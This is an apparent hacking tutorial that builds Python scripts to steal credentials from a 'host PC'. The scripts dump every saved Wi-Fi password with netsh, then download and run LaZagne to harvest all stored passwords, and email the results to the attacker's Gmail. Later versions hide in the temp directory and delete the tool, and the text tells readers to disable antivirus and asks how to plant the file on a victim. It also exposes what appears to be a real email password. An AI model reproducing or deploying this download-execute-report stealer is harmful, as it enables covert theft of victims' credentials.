#WHAT U WILL LEARN
To make a program that can
- SEND ALL SAVED WI-FI PASSWORD TO GMAIL
- STEALING PASSWORD FROM HOST PC
#CMDS OF WINDOWS
There are commands in windows that target a specific output
for example: If we put
- netsh wlan show profile
- (IT SHOW DETAILS ABOUT ALL WIFI CONNECTED BEFORE)
- netsh wlan show profile VIRUS [name of WIFI] key=clear
- (IT SHOW DETAILS ABOUT A SPECIFIC WIFI)
You can find by using these cmds which is executed on windows cmd-prompt
Now we know what to execute in win-cmd
#CODE: execute_and_report
Click to know more about smtplib
- #!/usr/bin/env python
- import subprocess, smtplib
- def send_mail(email, password, massage):
- server = smtplib.SMTP("smtp.gmail.com", 587)
- server.starttls()
- server.login(email, password)
- server.sendmail(email, email, massage)
- server.quit()
- command = "netsh wlan show profile virus key=clear"
- result = subprocess.check_output(command, shell=True)
- send_mail("driveunlimited4u@gmail.com", "UR PASSWORD", result)
- print("Sucessful...")
|
| But this works ONLY with specific WIFI (eg: VIRUS) |
#CODE: MODEFYING#1 [REGEX]
Here REGEX is used to filter command output
- #!/usr/bin/env python
- import subprocess, smtplib, re
- def send_mail(email, password, message):
- server = smtplib.SMTP("smtp.gmail.com", 587)
- server.starttls()
- server.login(email, password)
- server.sendmail(email, email, message)
- server.quit()
- command = "netsh wlan show profile"
- wifi = subprocess.check_output(command, shell=True)
- wifi_names_list = re.findall(b"(?:Profile\s*:\s)(.*)",wifi)
- result = ""
- for wifi_name in wifi_names_list:
- if b" " in wifi_name: continue
- command = "netsh wlan show profile " + str(wifi_name.decode('utf-8')) + " key=clear"
- current_result = subprocess.check_output(command, shell=True)
- result = result + str(current_result.decode('utf-8'))
- send_mail("driveunlimited4u@gmail.com", "hrd9209050619", result)
- print("Sucessful...")
# FOR LOOP EXPLANATION:
In this for loop I'm creating a new variable and I'm calling this new variable wifi name.
Python will automatically know that this is a list and that this variable should represent an element. Each time the loop runs.
So basically we're saying for each element in the list.
So for each wifi name in my wifi names list I want to print the wifi name.
So what this code will do is it'll go to the first element in here. It all started that in my new variable which is the wifi name.
It's printed on screen than in the next iteration of the list to go up again...And it all said network name to the next element in the list and then were printed that on screen. And this will keep going until the end of the list.
# STORING RESULT:
- Every time the loop runs it creates a result (password)
- So the result keeps changing as the loop is running
- To store all the password we use a new variable outside the loop
result = "" [OUTSID THE LOOP]
result = result + current_result
The result keeps getting adding every time the loop runs...
BIGGEST QUESTION:
HOW TO PUT THIS FILE IN HOST PC AND EXECUTE | AND NOT EVERYONE USE PYTHON IN WIN...WE WILL SEE THIS FURTHER...BE PATIENT AND LEARN!!
2.DOWNLOAD_FILE FUNCTION
# WORKING
- Download file on the system
- once packaged properly will work on all operating systems.
- simple but powerful.
#CODE: download_file function
TRYING TO DOWNLOAD AN IMAGE BY USING PYTHON
- #!/usr/bin/env python
- import requests
- def download(url):
- get_response = requests.get(url)
- print(get_response)
- # print(get_response.content) # show the actual content of the response
- download("https://images.hdqwalls.com/download/classic-anime-girl-with-umbrella-4k-f5-1920x1080.jpg")
When we execute the file we see the actual content is in binary... WHAT WE DO HERE is make a new_file and put all the binary stuff in that file and name the appropriate file extension like .jpg/.png etc
- #!/usr/bin/env python
- import requests
- def download(url):
- get_response = requests.get(url)
- print(get_response)
- with open("sample.txt", "w") as out_file:
- out_file.write("hey nube_coders")
- download("https://images.hdqwalls.com/download/classic-anime-girl-with-umbrella-4k-f5-1920x1080.jpg")
- #!/usr/bin/env python
- import requests
- def download(url):
- get_response = requests.get(url)
- file_name = url.split("/")[-1]
- with open(file_name, "wb") as out_file:
- out_file.write(get_response.content)
- download("https://images.hdqwalls.com/download/monogatari-series-anime-girls-oshino-shinobu-4k-wk-1920x1080.jpg")
- print("success..")
wb: Opens a file for writing only in binary format. Overwrites the file if the file exists. If the file does not exist, creates a new file for writing.
file_name = url.split("/")[-1]
The backslash is used to separate | Split the URL into parts
Now its time to add all the programs we have learned so far
Download + Execute + Report
Question What to Download? and what to execute?
INTRODUCING...
# laZagne
In short its a tool used to extract the password |many kinds of stuff from the host pc;)
SO BASICALLY WE ARE HACKING ALL THE PASSWORDS STORED
IN THE HOST PC AND SENDING THE VALUABLE OUTPUT IN G-MAIL...
|
| laZagen.exe |
execute lazagne.exe we see the following cmd to access the stuff/module
lazagne all: Which simply runs all the modules
- TO DOWNLOAD: lazagne.exe (cuz host does not have it)
- TO EXECUTE : lazagne all (to get all passwords)
- TO REPORT : G-MAIL... (to receive all the host's output)
#STUFF VERY IMPORTANT_TO AVOID ERROR
- RUN LaZagne only in Virtual machine/VM(win-10)
- Disable virus protection|real-time protection
- If laZagen.exe does not work try different bits like x32(x86)/x64bits
- 1st run the laZagen.exe and laZagen all in win-VM DIRECTLY to see if it works...As I deed in the image...
To download laZagne
- laZagen Git Repo
- laZagen direct link
#CODE: download_execute_report
IN SHORT: laZagne.exe will be downloaded then execute laZagen.all
and send all the valuable output to our G-mail
- #!/usr/bin/env python
- import requests, subprocess, smtplib
- def download(url):
- get_response = requests.get(url)
- file_name = url.split("/")[-1]
- with open(file_name, "wb") as out_file:
- out_file.write(get_response.content)
- def send_mail(email, password, message):
- server = smtplib.SMTP("smtp.gmail.com", 587)
- server.starttls()
- server.login(email, password)
- server.sendmail(email, email, message)
- server.quit()
- download("https://ikki.github.io/laZagne/laZagne.exe")
- result = subprocess.check_output("laZagen.exe all", shell=True)
- send_mail("G-mail", "Pass", result)
|
| download_execute_report |
|
| output |
#STUFF VERY IMPORTANT_TO AVOID ERRORs
- RUN LaZagne only in Virtual machine/VM(win-10)
- It may harm your real pc hence we are using in a virtual machine
- Disable virus protection|real-time protection
- If laZagen.exe does not work try different bits like x32(x86)/x64bits
- 1st run the laZagen.exe and laZagen all in win-VM DIRECTLY to see if it works...As I deed in the image...
- #!/usr/bin/env python
- import requests, subprocess, smtplib, os, tempfile
- def download(url):
- get_response = requests.get(url)
- file_name = url.split("/")[-1]
- with open(file_name, "wb") as out_file:
- out_file.write(get_response.content)
- def send_mail(email, password, message):
- server = smtplib.SMTP("smtp.gmail.com", 587)
- server.starttls()
- server.login(email, password)
- server.sendmail(email, email, message)
- server.quit()
- temp_directory = tempfile.gettempdir()
- os.chdir(temp_directory)
- download("https://ikki.github.io/laZagne/laZagne.exe")
- result = subprocess.check_output("laZagne.exe all", shell=True)
- send_mail("G-mail", "Pass", result)
- os.remove("laZagen.exe")
- print("success...")
